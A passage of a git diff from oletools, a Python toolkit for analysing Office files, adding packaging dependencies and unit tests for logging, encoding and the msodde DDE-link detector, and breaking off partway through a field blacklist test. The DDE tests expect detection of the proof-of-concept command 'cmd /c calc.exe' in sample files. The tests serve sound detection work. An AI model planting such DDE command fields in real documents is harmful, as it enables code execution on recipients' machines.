'rtfobj=oletools.rtfobj:main',
'oleobj=oletools.oleobj:main',
'msodde=oletools.msodde:main',
+ 'olefile=olefile.olefile:main',
],
}
@@ -308,14 +308,22 @@ def main():
author_email=author_email,
url=url,
license=license,
-## package_dir=package_dir,
+ # package_dir=package_dir,
packages=packages,
package_data = package_data,
download_url=download_url,
-# data_files=data_files,
+ # data_files=data_files,
entry_points=entry_points,
test_suite="tests",
# scripts=scripts,
+ install_requires=[
+ "pyparsing>=2.1.0,<3", # changed from 2.2.0 to 2.1.0 for issue #481
+ "olefile>=0.46",
+ "easygui",
+ 'colorclass',
+ 'msoffcrypto-tool',
+ 'pcodedmp>=1.2.5',
+ ],
)
diff --git a/oletools/thirdparty/pyparsing/__init__.py b/tests/common/__init__.py
similarity index 100%
rename from oletools/thirdparty/pyparsing/__init__.py
rename to tests/common/__init__.py
diff --git a/tests/msodde_doc/__init__.py b/tests/common/log_helper/__init__.py
similarity index 100%
rename from tests/msodde_doc/__init__.py
rename to tests/common/log_helper/__init__.py
diff --git a/tests/common/log_helper/log_helper_test_imported.py b/tests/common/log_helper/log_helper_test_imported.py
new file mode 100644
index 00000000..8820a3e3
--- /dev/null
+++ b/tests/common/log_helper/log_helper_test_imported.py
@@ -0,0 +1,26 @@
+"""
+Dummy file that logs messages, meant to be imported
+by the main test file
+"""
+
+from oletools.common.log_helper import log_helper
+import logging
+
+DEBUG_MESSAGE = 'imported: debug log'
+INFO_MESSAGE = 'imported: info log'
+WARNING_MESSAGE = 'imported: warning log'
+ERROR_MESSAGE = 'imported: error log'
+CRITICAL_MESSAGE = 'imported: critical log'
+RESULT_MESSAGE = 'imported: result log'
+RESULT_TYPE = 'imported: result'
+
+logger = log_helper.get_or_create_silent_logger('test_imported', logging.ERROR)
+
+
+def log():
+ logger.debug(DEBUG_MESSAGE)
+ logger.info(INFO_MESSAGE)
+ logger.warning(WARNING_MESSAGE)
+ logger.error(ERROR_MESSAGE)
+ logger.critical(CRITICAL_MESSAGE)
+ logger.info(RESULT_MESSAGE, type=RESULT_TYPE)
diff --git a/tests/common/log_helper/log_helper_test_main.py b/tests/common/log_helper/log_helper_test_main.py
new file mode 100644
index 00000000..fb0ccca2
--- /dev/null
+++ b/tests/common/log_helper/log_helper_test_main.py
@@ -0,0 +1,64 @@
+""" Test log_helpers """
+
+import sys
+from tests.common.log_helper import log_helper_test_imported
+from oletools.common.log_helper import log_helper
+
+DEBUG_MESSAGE = 'main: debug log'
+INFO_MESSAGE = 'main: info log'
+WARNING_MESSAGE = 'main: warning log'
+ERROR_MESSAGE = 'main: error log'
+CRITICAL_MESSAGE = 'main: critical log'
+RESULT_MESSAGE = 'main: result log'
+RESULT_TYPE = 'main: result'
+
+logger = log_helper.get_or_create_silent_logger('test_main')
+
+
+def init_logging_and_log(args):
+ """
+ Try to cover possible logging scenarios. For each scenario covered, here's the expected args and outcome:
+ - Log without enabling: ['']
+ * logging when being imported - should never print
+ - Log as JSON without enabling: ['as-json', '']
+ * logging as JSON when being imported - should never print
+ - Enable and log: ['enable', '']
+ * logging when being run as script - should log messages
+ - Enable and log as JSON: ['as-json', 'enable', '']
+ * logging as JSON when being run as script - should log messages as JSON
+ - Enable, log as JSON and throw: ['enable', 'as-json', 'throw', '']
+ * should produce JSON-compatible output, even after an unhandled exception
+ """
+
+ # the level should always be the last argument passed
+ level = args[-1]
+ use_json = 'as-json' in args
+ throw = 'throw' in args
+ percent_autoformat = '%-autoformat' in args
+
+ if 'enable' in args:
+ log_helper.enable_logging(use_json, level, stream=sys.stdout)
+
+ _log()
+
+ if percent_autoformat:
+ logger.info('The %s is %d.', 'answer', 47)
+
+ if throw:
+ raise Exception('An exception occurred before ending the logging')
+
+ log_helper.end_logging()
+
+
+def _log():
+ logger.debug(DEBUG_MESSAGE)
+ logger.info(INFO_MESSAGE)
+ logger.warning(WARNING_MESSAGE)
+ logger.error(ERROR_MESSAGE)
+ logger.critical(CRITICAL_MESSAGE)
+ logger.info(RESULT_MESSAGE, type=RESULT_TYPE)
+ log_helper_test_imported.log()
+
+
+if __name__ == '__main__':
+ init_logging_and_log(sys.argv[1:])
diff --git a/tests/common/log_helper/test_log_helper.py b/tests/common/log_helper/test_log_helper.py
new file mode 100644
index 00000000..bcd0de0f
--- /dev/null
+++ b/tests/common/log_helper/test_log_helper.py
@@ -0,0 +1,170 @@
+""" Test the log helper
+
+This tests the generic log helper.
+Check if it handles imported modules correctly
+and that the default silent logger won't log when nothing is enabled
+"""
+
+import unittest
+import sys
+import json
+import subprocess
+from tests.common.log_helper import log_helper_test_main
+from tests.common.log_helper import log_helper_test_imported
+from os.path import dirname, join, relpath, abspath
+
+from tests.test_utils import PROJECT_ROOT
+
+# this is the common base of "tests" and "oletools" dirs
+TEST_FILE = relpath(join(dirname(abspath(__file__)), 'log_helper_test_main.py'),
+ PROJECT_ROOT)
+PYTHON_EXECUTABLE = sys.executable
+
+MAIN_LOG_MESSAGES = [
+ log_helper_test_main.DEBUG_MESSAGE,
+ log_helper_test_main.INFO_MESSAGE,
+ log_helper_test_main.WARNING_MESSAGE,
+ log_helper_test_main.ERROR_MESSAGE,
+ log_helper_test_main.CRITICAL_MESSAGE
+]
+
+
+class TestLogHelper(unittest.TestCase):
+ def test_it_doesnt_log_when_not_enabled(self):
+ output = self._run_test(['debug'])
+ self.assertTrue(len(output) == 0)
+
+ def test_it_doesnt_log_json_when_not_enabled(self):
+ output = self._run_test(['as-json', 'debug'])
+ self.assertTrue(len(output) == 0)
+
+ def test_logs_when_enabled(self):
+ output = self._run_test(['enable', 'warning'])
+
+ expected_messages = [
+ log_helper_test_main.WARNING_MESSAGE,
+ log_helper_test_main.ERROR_MESSAGE,
+ log_helper_test_main.CRITICAL_MESSAGE,
+ log_helper_test_imported.WARNING_MESSAGE,
+ log_helper_test_imported.ERROR_MESSAGE,
+ log_helper_test_imported.CRITICAL_MESSAGE
+ ]
+
+ for msg in expected_messages:
+ self.assertIn(msg, output)
+
+ def test_logs_json_when_enabled(self):
+ output = self._run_test(['enable', 'as-json', 'critical'])
+
+ self._assert_json_messages(output, [
+ log_helper_test_main.CRITICAL_MESSAGE,
+ log_helper_test_imported.CRITICAL_MESSAGE
+ ])
+
+ def test_logs_type_ignored(self):
+ """Run test script with logging enabled at info level. Want no type."""
+ output = self._run_test(['enable', 'info'])
+
+ expect = '\n'.join([
+ 'INFO ' + log_helper_test_main.INFO_MESSAGE,
+ 'WARNING ' + log_helper_test_main.WARNING_MESSAGE,
+ 'ERROR ' + log_helper_test_main.ERROR_MESSAGE,
+ 'CRITICAL ' + log_helper_test_main.CRITICAL_MESSAGE,
+ 'INFO ' + log_helper_test_main.RESULT_MESSAGE,
+ 'INFO ' + log_helper_test_imported.INFO_MESSAGE,
+ 'WARNING ' + log_helper_test_imported.WARNING_MESSAGE,
+ 'ERROR ' + log_helper_test_imported.ERROR_MESSAGE,
+ 'CRITICAL ' + log_helper_test_imported.CRITICAL_MESSAGE,
+ 'INFO ' + log_helper_test_imported.RESULT_MESSAGE,
+ ])
+ self.assertEqual(output, expect)
+
+ def test_logs_type_in_json(self):
+ """Check type field is contained in json log."""
+ output = self._run_test(['enable', 'as-json', 'info'])
+
+ # convert to json preserving order of output
+ jout = json.loads(output)
+
+ jexpect = [
+ dict(type='msg', level='INFO',
+ msg=log_helper_test_main.INFO_MESSAGE),
+ dict(type='msg', level='WARNING',
+ msg=log_helper_test_main.WARNING_MESSAGE),
+ dict(type='msg', level='ERROR',
+ msg=log_helper_test_main.ERROR_MESSAGE),
+ dict(type='msg', level='CRITICAL',
+ msg=log_helper_test_main.CRITICAL_MESSAGE),
+ # this is the important entry (has a different "type" field):
+ dict(type=log_helper_test_main.RESULT_TYPE, level='INFO',
+ msg=log_helper_test_main.RESULT_MESSAGE),
+ dict(type='msg', level='INFO',
+ msg=log_helper_test_imported.INFO_MESSAGE),
+ dict(type='msg', level='WARNING',
+ msg=log_helper_test_imported.WARNING_MESSAGE),
+ dict(type='msg', level='ERROR',
+ msg=log_helper_test_imported.ERROR_MESSAGE),
+ dict(type='msg', level='CRITICAL',
+ msg=log_helper_test_imported.CRITICAL_MESSAGE),
+ # ... and this:
+ dict(type=log_helper_test_imported.RESULT_TYPE, level='INFO',
+ msg=log_helper_test_imported.RESULT_MESSAGE),
+ ]
+ self.assertEqual(jout, jexpect)
+
+ def test_percent_autoformat(self):
+ """Test that auto-formatting of log strings with `%` works."""
+ output = self._run_test(['enable', '%-autoformat', 'info'])
+ self.assertIn('The answer is 47.', output)
+
+ def test_json_correct_on_exceptions(self):
+ """
+ Test that even on unhandled exceptions our JSON is always correct
+ """
+ output = self._run_test(['enable', 'as-json', 'throw', 'critical'], False)
+ self._assert_json_messages(output, [
+ log_helper_test_main.CRITICAL_MESSAGE,
+ log_helper_test_imported.CRITICAL_MESSAGE
+ ])
+
+ def _assert_json_messages(self, output, messages):
+ try:
+ json_data = json.loads(output)
+ self.assertEqual(len(json_data), len(messages))
+
+ for i in range(len(messages)):
+ self.assertEqual(messages[i], json_data[i]['msg'])
+ except ValueError:
+ self.fail('Invalid json:\n' + output)
+
+ self.assertNotEqual(len(json_data), 0, msg='Output was empty')
+
+ def _run_test(self, args, should_succeed=True):
+ """
+ Use subprocess to better simulate the real scenario and avoid
+ logging conflicts when running multiple tests (since logging depends on singletons,
+ we might get errors or false positives between sequential tests runs)
+ """
+ child = subprocess.Popen(
+ [PYTHON_EXECUTABLE, TEST_FILE] + args,
+ shell=False,
+ env={'PYTHONPATH': PROJECT_ROOT},
+ universal_newlines=True,
+ cwd=PROJECT_ROOT,
+ stdin=None,
+ stdout=subprocess.PIPE,
+ stderr=subprocess.PIPE
+ )
+ (output, output_err) = child.communicate()
+
+ if not isinstance(output, str):
+ output = output.decode('utf-8')
+
+ self.assertEqual(child.returncode == 0, should_succeed)
+
+ return output.strip()
+
+
+# just in case somebody calls this file as a script
+if __name__ == '__main__':
+ unittest.main()
diff --git a/tests/common/test_encoding_handler.py b/tests/common/test_encoding_handler.py
new file mode 100644
index 00000000..42d4565c
--- /dev/null
+++ b/tests/common/test_encoding_handler.py
@@ -0,0 +1,207 @@
+"""Test common.ensure_stdout_handles_unicode"""
+
+from __future__ import print_function
+
+import unittest
+import sys
+from subprocess import check_call, CalledProcessError
+from tempfile import mkstemp
+import os
+from os.path import isfile
+from contextlib import contextmanager
+
+FILE_TEXT = u'The unicode check mark is \u2713.\n'
+
+@contextmanager
+def temp_file(just_name=True):
+ """Context manager that creates temp file and deletes it in the end"""
+ tmp_descriptor = None
+ tmp_name = None
+ tmp_handle = None
+ try:
+ tmp_descriptor, tmp_name = mkstemp()
+
+ # we create our own file handle since we want to be able to close the
+ # file and open it again for reading.
+ # We keep the os-level descriptor open so file name is still reserved
+ # for us
+ if just_name:
+ yield tmp_name
+ else:
+ tmp_handle = open(tmp_name, 'wb')
+ yield tmp_handle, tmp_name
+ except Exception:
+ raise
+ finally:
+ if tmp_descriptor is not None:
+ os.close(tmp_descriptor)
+ if tmp_handle is not None:
+ tmp_handle.close()
+ if tmp_name is not None and isfile(tmp_name):
+ os.unlink(tmp_name)
+
+
+class TestEncodingHandler(unittest.TestCase):
+ """Tests replacing stdout encoding in various scenarios"""
+
+ def test_print(self):
+ """Test regular unicode output not raise error"""
+ check_call('{python} {this_file} print'.format(python=sys.executable,
+ this_file=__file__),
+ shell=True)
+
+ def test_print_redirect(self):
+ """
+ Test redirection of unicode output to files does not raise error
+
+ TODO: test this on non-linux OSs
+ """
+ with temp_file() as tmp_file:
+ check_call('{python} {this_file} print > {tmp_file}'
+ .format(python=sys.executable, this_file=__file__,
+ tmp_file=tmp_file),
+ shell=True)
+
+ @unittest.skipIf(not sys.platform.startswith('linux'),
+ 'Only tested on linux sofar')
+ def test_print_no_lang(self):
+ """
+ Test redirection of unicode output to files does not raise error
+
+ TODO: Adapt this for other OSs; for win create batch script
+ """
+ check_call('LANG=C {python} {this_file} print'
+ .format(python=sys.executable, this_file=__file__),
+ shell=True)
+
+ def test_uopen(self):
+ """Test that uopen in a nice environment is ok"""
+ with temp_file(False) as (tmp_handle, tmp_file):
+ tmp_handle.write(FILE_TEXT.encode('utf8'))
+ tmp_handle.close()
+
+ try:
+ check_call('{python} {this_file} read {tmp_file}'
+ .format(python=sys.executable, this_file=__file__,
+ tmp_file=tmp_file),
+ shell=True)
+ except CalledProcessError as cpe:
+ self.fail(cpe.output)
+
+ def test_uopen_redirect(self):
+ """
+ Test redirection of unicode output to files does not raise error
+
+ TODO: test this on non-linux OSs
+ """
+ with temp_file(False) as (tmp_handle, tmp_file):
+ tmp_handle.write(FILE_TEXT.encode('utf8'))
+ tmp_handle.close()
+
+ with temp_file() as redirect_file:
+ try:
+ check_call(
+ '{python} {this_file} read {tmp_file} >{redirect_file}'
+ .format(python=sys.executable, this_file=__file__,
+ tmp_file=tmp_file, redirect_file=redirect_file),
+ shell=True)
+ except CalledProcessError as cpe:
+ self.fail(cpe.output)
+
+ @unittest.skipIf(not sys.platform.startswith('linux'),
+ 'Only tested on linux sofar')
+ def test_uopen_no_lang(self):
+ """
+ Test that uopen in a C-LANG environment is ok
+
+ TODO: Adapt this for other OSs; for win create batch script
+ """
+ with temp_file(False) as (tmp_handle, tmp_file):
+ tmp_handle.write(FILE_TEXT.encode('utf8'))
+ tmp_handle.close()
+
+ try:
+ check_call('LANG=C {python} {this_file} read {tmp_file}'
+ .format(python=sys.executable, this_file=__file__,
+ tmp_file=tmp_file),
+ shell=True)
+ except CalledProcessError as cpe:
+ self.fail(cpe.output)
+
+
+def run_read(filename):
+ """This is called from test_uopen* tests as script. Reads text, compares"""
+ from oletools.common.io_encoding import uopen
+ # open file
+ with uopen(filename, 'rt') as reader:
+ # a few tests
+ if reader.closed:
+ raise ValueError('handle is closed!')
+ if reader.name != filename:
+ raise ValueError('Wrong filename {}'.format(reader.name))
+ if reader.isatty():
+ raise ValueError('Reader is a tty!')
+ if reader.tell() != 0:
+ raise ValueError('Reader.tell is not 0 at beginning')
+
+ # read text
+ text = reader.read()
+
+ # a few more tests
+ if not reader.closed:
+ raise ValueError('Reader is not closed outside context')
+ if reader.name != filename:
+ raise ValueError('Wrong filename {} after context'.format(reader.name))
+ # the following test raises an exception because reader is closed, so isatty cannot be called:
+ # if reader.isatty():
+ # raise ValueError('Reader has become a tty!')
+
+ # compare text
+ if sys.version_info.major <= 2: # in python2 get encoded byte string
+ expect = FILE_TEXT.encode('utf8')
+ else: # python3: should get real unicode
+ expect = FILE_TEXT
+ if text != expect:
+ raise ValueError('Wrong contents: {!r} != {!r}'
+ .format(text, expect))
+ return 0
+
+
+def run_print():
+ """This is called from test_read* tests as script. Prints & logs unicode"""
+ from oletools.common.io_encoding import ensure_stdout_handles_unicode
+ from oletools.common.log_helper import log_helper
+ ensure_stdout_handles_unicode()
+ print(u'Check: \u2713') # print check mark
+
+ # check logging as well
+ logger = log_helper.get_or_create_silent_logger('test_encoding_handler')
+ log_helper.enable_logging(False, 'debug', stream=sys.stdout)
+ logger.info(u'Check: \u2713')
+ return 0
+
+
+# tests call this file as script
+if __name__ == '__main__':
+ if len(sys.argv) < 2:
+ sys.exit(unittest.main())
+
+ # hack required to import common from parent dir, not system-wide one
+ # (usually unittest seems to do that for us)
+ from os.path import abspath, dirname, join
+ ole_base = dirname(dirname(dirname(abspath(__file__))))
+ sys.path.insert(0, ole_base)
+
+ if sys.argv[1] == 'print':
+ if len(sys.argv) > 2:
+ print('Expect no arg for "print"', file=sys.stderr)
+ sys.exit(2)
+ sys.exit(run_print())
+ elif sys.argv[1] == 'read':
+ if len(sys.argv) != 3:
+ print('Expect single arg for "read"', file=sys.stderr)
+ sys.exit(2)
+ sys.exit(run_read(sys.argv[2]))
+ else:
+ print('Unexpected argument: {}'.format(sys.argv[1]), file=sys.stderr)
+ sys.exit(2)
diff --git a/tests/howto_add_unittests.txt b/tests/howto_add_unittests.txt
index 3178741e..2501bcc1 100644
--- a/tests/howto_add_unittests.txt
+++ b/tests/howto_add_unittests.txt
@@ -1,8 +1,12 @@
Howto: Add unittests
--------------------
-For helping python's unittest to discover your tests, do the
-following:
+Note: The following are just guidelines to help inexperienced users create unit
+tests. The python unittest library (see
+https://docs.python.org/2/library/unittest.html) offers much more flexibility
+than described here.
+
+For helping python's unittest to discover your tests, do the following:
* create a subdirectory within oletools/tests/
- The directory name must be a valid python package name,
diff --git a/tests/msodde/__init__.py b/tests/msodde/__init__.py
new file mode 100644
index 00000000..e69de29b
diff --git a/tests/msodde/test_basic.py b/tests/msodde/test_basic.py
new file mode 100644
index 00000000..9d658bdf
--- /dev/null
+++ b/tests/msodde/test_basic.py
@@ -0,0 +1,224 @@
+""" Test some basic behaviour of msodde.py
+
+Ensure that
+- doc and docx are read without error
+- garbage returns error return status
+- dde-links are found where appropriate
+"""
+
+from __future__ import print_function
+
+import unittest
+import sys
+import os
+from os.path import join, basename
+from traceback import print_exc
+import json
+from collections import OrderedDict
+from oletools import msodde
+from oletools.crypto import \
+ WrongEncryptionPassword, CryptoLibNotImported, check_msoffcrypto
+from tests.test_utils import call_and_capture, DATA_BASE_DIR as BASE_DIR
+
+
+class TestReturnCode(unittest.TestCase):
+ """ check return codes and exception behaviour (not text output) """
+ def test_valid_doc(self):
+ """ check that a valid doc file leads to 0 exit status """
+ for filename in (
+ 'harmless-clean',
+ # TODO: TEMPORARILY DISABLED UNTIL ISSUE #215 IS FIXED:
+ # 'dde-test-from-office2003',
+ # 'dde-test-from-office2016',
+ # 'dde-test-from-office2013-utf_16le-korean'
+ ):
+ self.do_test_validity(join(BASE_DIR, 'msodde',
+ filename + '.doc'))
+
+ def test_valid_docx(self):
+ """ check that a valid docx file leads to 0 exit status """
+ for filename in 'dde-test', 'harmless-clean':
+ self.do_test_validity(join(BASE_DIR, 'msodde',
+ filename + '.docx'))
+
+ def test_valid_docm(self):
+ """ check that a valid docm file leads to 0 exit status """
+ for filename in 'dde-test', 'harmless-clean':
+ self.do_test_validity(join(BASE_DIR, 'msodde',
+ filename + '.docm'))
+
+ def test_valid_xml(self):
+ """ check that xml leads to 0 exit status """
+ for filename in (
+ 'harmless-clean-2003.xml',
+ 'dde-in-excel2003.xml',
+ # TODO: TEMPORARILY DISABLED UNTIL ISSUE #215 IS FIXED:
+ # 'dde-in-word2003.xml',
+ # 'dde-in-word2007.xml'
+ ):
+ self.do_test_validity(join(BASE_DIR, 'msodde', filename))
+
+ def test_invalid_none(self):
+ """ check that no file argument leads to non-zero exit status """
+ if sys.hexversion > 0x03030000: # version 3.3 and higher
+ # different errors probably depending on whether msoffcryto is
+ # available or not
+ expect_error = (AttributeError, FileNotFoundError)
+ else:
+ expect_error = (AttributeError, IOError)
+ self.do_test_validity('', expect_error)
+
+ def test_invalid_empty(self):
+ """ check that empty file argument leads to non-zero exit status """
+ self.do_test_validity(join(BASE_DIR, 'basic/empty'), Exception)
+
+ def test_invalid_text(self):
+ """ check that text file argument leads to non-zero exit status """
+ self.do_test_validity(join(BASE_DIR, 'basic/text'), Exception)
+
+ def test_encrypted(self):
+ """
+ check that encrypted files lead to non-zero exit status
+
+ Currently, only the encryption applied by Office 2010 (CryptoApi RC4
+ Encryption) is tested.
+ """
+ CRYPT_DIR = join(BASE_DIR, 'encrypted')
+ have_crypto = check_msoffcrypto()
+ for filename in os.listdir(CRYPT_DIR):
+ if have_crypto and 'standardpassword' in filename:
+ # these are automagically decrypted
+ self.do_test_validity(join(CRYPT_DIR, filename))
+ elif have_crypto:
+ self.do_test_validity(join(CRYPT_DIR, filename),
+ WrongEncryptionPassword)
+ else:
+ self.do_test_validity(join(CRYPT_DIR, filename),
+ CryptoLibNotImported)
+
+ def do_test_validity(self, filename, expect_error=None):
+ """ helper for test_[in]valid_* """
+ found_error = None
+ # DEBUG: print('Testing file {}'.format(filename))
+ try:
+ msodde.process_maybe_encrypted(filename,
+ field_filter_mode=msodde.FIELD_FILTER_BLACKLIST)
+ except Exception as exc:
+ found_error = exc
+ # DEBUG: print_exc()
+
+ if expect_error and not found_error:
+ self.fail('Expected {} but msodde finished without errors for {}'
+ .format(expect_error, filename))
+ elif not expect_error and found_error:
+ self.fail('Unexpected error {} from msodde for {}'
+ .format(found_error, filename))
+ elif expect_error and not isinstance(found_error, expect_error):
+ self.fail('Wrong kind of error {} from msodde for {}, expected {}'
+ .format(type(found_error), filename, expect_error))
+
+
+@unittest.skipIf(not check_msoffcrypto(),
+ 'Module msoffcrypto not installed for {}'
+ .format(basename(sys.executable)))
+class TestErrorOutput(unittest.TestCase):
+ """msodde does not specify error by return code but text output."""
+
+ def test_crypt_output(self):
+ """Check for helpful error message when failing to decrypt."""
+ for suffix in 'doc', 'docm', 'docx', 'ppt', 'pptm', 'pptx', 'xls', \
+ 'xlsb', 'xlsm', 'xlsx':
+ example_file = join(BASE_DIR, 'encrypted', 'encrypted.' + suffix)
+ output, ret_code = call_and_capture('msodde', [example_file, ],
+ accept_nonzero_exit=True)
+ self.assertEqual(ret_code, 1)
+ self.assertIn('passwords could not decrypt office file', output,
+ msg='Unexpected output: {}'.format(output.strip()))
+
+
+class TestDdeLinks(unittest.TestCase):
+ """ capture output of msodde and check dde-links are found correctly """
+
+ @staticmethod
+ def get_dde_from_output(output):
+ """ helper to read dde links from captured output
+ """
+ return [o for o in output.splitlines()]
+
+ # TODO: TEMPORARILY DISABLED UNTIL ISSUE #215 IS FIXED:
+ # def test_with_dde(self):
+ # """ check that dde links appear on stdout """
+ # filename = 'dde-test-from-office2003.doc'
+ # output = msodde.process_maybe_encrypted(
+ # join(BASE_DIR, 'msodde', filename),
+ # field_filter_mode=msodde.FIELD_FILTER_BLACKLIST)
+ # self.assertNotEqual(len(self.get_dde_from_output(output)), 0,
+ # msg='Found no dde links in output of ' + filename)
+
+ def test_no_dde(self):
+ """ check that no dde links appear on stdout """
+ filename = 'harmless-clean.doc'
+ output = msodde.process_maybe_encrypted(
+ join(BASE_DIR, 'msodde', filename),
+ field_filter_mode=msodde.FIELD_FILTER_BLACKLIST)
+ self.assertEqual(len(self.get_dde_from_output(output)), 0,
+ msg='Found dde links in output of ' + filename)
+
+ # TODO: TEMPORARILY DISABLED UNTIL ISSUE #215 IS FIXED:
+ # def test_with_dde_utf16le(self):
+ # """ check that dde links appear on stdout """
+ # filename = 'dde-test-from-office2013-utf_16le-korean.doc'
+ # output = msodde.process_maybe_encrypted(
+ # join(BASE_DIR, 'msodde', filename),
+ # field_filter_mode=msodde.FIELD_FILTER_BLACKLIST)
+ # self.assertNotEqual(len(self.get_dde_from_output(output)), 0,
+ # msg='Found no dde links in output of ' + filename)
+
+ def test_excel(self):
+ """ check that dde links are found in excel 2007+ files """
+ expect = ['cmd /c calc.exe', ]
+ for extn in 'xlsx', 'xlsm', 'xlsb':
+ output = msodde.process_maybe_encrypted(
+ join(BASE_DIR, 'msodde', 'dde-test.' + extn),
+ field_filter_mode=msodde.FIELD_FILTER_BLACKLIST)
+
+ self.assertEqual(expect, self.get_dde_from_output(output),
+ msg='unexpected output for dde-test.{0}: {1}'
+ .format(extn, output))
+
+ def test_xml(self):
+ """ check that dde in xml from word / excel is found """
+ # TODO: TEMPORARILY DISABLED UNTIL ISSUE #215 IS FIXED:
+ for name_part in ('excel2003',): #, 'word2003', 'word2007':
+ filename = 'dde-in-' + name_part + '.xml'
+ output = msodde.process_maybe_encrypted(
+ join(BASE_DIR, 'msodde', filename),
+ field_filter_mode=msodde.FIELD_FILTER_BLACKLIST)
+ links = self.get_dde_from_output(output)
+ self.assertEqual(len(links), 1, 'found {0} dde-links in {1}'
+ .format(len(links), filename))
+ self.assertTrue('cmd' in links[0], 'no "cmd" in dde-link for {0}'
+ .format(filename))
+ self.assertTrue('calc' in links[0], 'no "calc" in dde-link for {0}'
+ .format(filename))
+
+ def test_clean_rtf_blacklist(self):
+ """ find a lot of hyperlinks in rtf spec """
+ filename = 'RTF-Spec-1.7.rtf'
+ output = msodde.process_maybe_encrypted(
+ join(BASE_DIR, 'msodde', filename),
+ field_filter_mode=msodde.FIELD_FILTER_BLACKLIST)
+ self.assertEqual(len(self.get_dde_from_output(output)), 1413)
+
+ def test_clean_rtf_ddeonly(self):
+ """ find no dde links in rtf spec """
+ filename = 'RTF-Spec-1.7.rtf'
+ output = msodde.process_maybe_encrypted(
+ join(BASE_DIR, 'msodde', filename),
+ field_filter_mode=msodde.FIELD_FILTER_DDE)
+ self.assertEqual(len(self.get_dde_from_output(output)), 0,
+ msg='Found dde links in output of ' + filename)
+
+
+if __name__ == '__main__':
+ unittest.main()
diff --git a/tests/msodde/test_blacklist.py b/tests/msodde/test_blacklist.py
new file mode 100644
index 00000000..5a557f6b
--- /dev/null
+++ b/tests/msodde/test_blacklist.py
@@ -0,0 +1,250 @@
+""" Test the msodde blacklist feature
+
+Take a few examples from the standard (iso29500-1:2016) and see that they match
+"""
+
+import unittest
+from oletools.msodde import field_is_blacklisted
+
+EXAMPLES_MATCH = (
+ r'DATE',
+ r'DATE \@ "dddd, MMMM dd, yyyy"',
+ r'DATE \@ "dddd, MMMM dd, yyyy" \h',
+ r'DATE \@ "M/d/yyyy"',
+ r'DATE \@ "dddd, MMMM dd, yyyy"',
+ r'DATE \@ "MMMM d, yyyy"',
+ r'DATE \@ "M/d/yy"',
+ r'DATE \@ "yyyy-MM-dd"',
+ r'DATE \@ "d-MMM-yy"',
+ r'DATE \@ "M.d.yyyy"',
+ r'DATE \@ "MMM. d, yy"',
+ r'DATE \@ "d MMMM yyyy"',
+ r'DATE \@ "MMMM yy"',
+ r'DATE \@ "MMM-yy"',
+ r'DATE \@ "M/d/yyyy h:mm am/pm"',
+ r'DATE \@ "M/d/yyyy h:mm:ss am/pm"',
+ r'DATE \@ "h:mm am/pm"',
+ r'DATE \@ "h:mm:ss am/pm"',
+ r'DATE \@ "HH:mm"',
+ r'DATE \@ "\'Today is \'HH:mm:ss"',
+ r'USERNAME "mary smith" \* Caps',
+ r'USERNAME "mary smith" \* FirstCap',
+ r'USERNAME "Mary Smith" \* Lower',
+ r'USERNAME "Mary Smith" \* Upper',
+ r'DATE \* CHARFORMAT',
+ r'TIME \@ "HH:mm:ss" \* MERGEFORMAT',
+ r'ADVANCE \u 6',
+ r'ADVANCE \d 12',
+ r'ADVANCE \l 20',
+ r'ADVANCE \x 150',
+ r'AUTHOR',
+ r'AUTHOR "Tony Caruso"',
+ r'BIBLIOGRAPHY \l 1033', # note: the original example has "/l 1033"
+ r'CITATION Ecma01 \l 1033', # note: this also. Hope this is just a typo
+ r'COMMENTS',
+ r'COMMENTS "I came, I saw, I was not impressed."',
+ r'CREATEDATE',
+ r'CREATEDATE \@ "dddd, MMMM dd, yyyy HH:mm:ss"',
+ r'CREATEDATE \@ "dddd, MMMM dd, yyyy HH:mm:ss" \h',
+ r'CREATEDATE \@ "dddd, MMMM dd, yyyy HH:mm:ss" \s',
+ r'DATE',
+ r'DATE \@ "dddd, MMMM dd, yyyy HH:mm:ss"',
+ r'DATE \@ "dddd, MMMM dd, yyyy HH:mm:ss" \h',
+ r'DATE \@ "dddd, MMMM dd, yyyy HH:mm:ss" \s',
+ r'EDITTIME',
+ r'EDITTIME \* OrdText',
+ r'FILENAME \* Upper',
+ r'FILENAME \p',
+ r'FILESIZE \# #,##0',
+ r'FILESIZE \k',
+ r'FILESIZE \m',
+ r'FORMCHECKBOX',
+ r'FORMDROPDOWN',
+ r'FORMTEXT',
+ r'INDEX \c "1" \e "tab" \g " to " \h "A" \z "1033"',
+ r'KEYWORDS',
+ r'KEYWORDS "field, formatting, switch, syntax"',
+ r'LASTSAVEDBY \* Upper',
+ r'LISTNUM NumberDefault \l 3 \s 1',
+ r'LISTNUM',
+ r'LISTNUM NumberDefault',
+ r'LISTNUM NumberDefault \s 3',
+ r'LISTNUM NumberDefault \l 1',
+ r'LISTNUM NumberDefault \l 1 \s 1',
+ r'LISTNUM LegalDefault \l 1 \s 1', # note: original example uses '\1'
+ r'NOTEREF F10',
+ r'NUMCHARS',
+ r'NUMCHARS \# #,##0',
+ r'NUMPAGES \# #,##0',
+ r'NUMPAGES \* OrdText',
+ r'NUMWORDS',
+ r'NUMWORDS \# #,##0',
+ r'PAGE',
+ r'PAGE \* ArabicDash',
+ r'PAGE \* ALPHABETIC',
+ r'PAGE \* roman',
+ r'PAGEREF Worldpop1990 \p',
+ r'PRINTDATE',
+ r'PRINTDATE \@ "dddd, MMMM dd, yyyy HH:mm:ss"',
+ r'REVNUM',
+ r'SAVEDATE',
+ r'SAVEDATE \@ "dddd, MMMM dd, yyyy HH:mm:ss"',
+ r'SECTION',
+ r'SECTION \* ArabicDash',
+ r'SECTION \* ALPHABETIC',
+ r'SECTION \* roman',
+ r'SECTIONPAGES',
+ r'SECTIONPAGES \* ArabicDash',
+ r'SECTIONPAGES \* ALPHABETIC',
+ r'SECTIONPAGES \* roman',
+ r'SEQ Figure',
+ r'SEQ Figure \* roman',
+ r'SEQ Figure \n',
+ r'SEQ Figure \c',
+ r'SEQ Figure \h',
+ r'SEQ Figure',
+ r'SEQ Figure \r 1',
+ r'SEQ Figure',
+ r'STYLEREF "Heading 3"',
+ r'STYLEREF "Last Name"',
+ r'STYLEREF "Last Name" \l',
+ r'SUBJECT',
+ r'SUBJECT "A specification for WordprocessingML Fields"',
+ r'SYMBOL 65',
+ r'SYMBOL 66 \a',
+ r'SYMBOL 67 \u',
+ r'SYMBOL 0x20ac \u',
+ r'SYMBOL 68',
+ r'SYMBOL 68 \f Symbol',
+ r'SYMBOL 40 \f Wingdings \s 24',
+ r'TA \l "Hotels v. Leisure Time" \c 2',
+ r'TA \l "Baldwin v. Alberti, 58 Wn. 2d 243 (1961)" \s "Baldwin v. Alberti"'
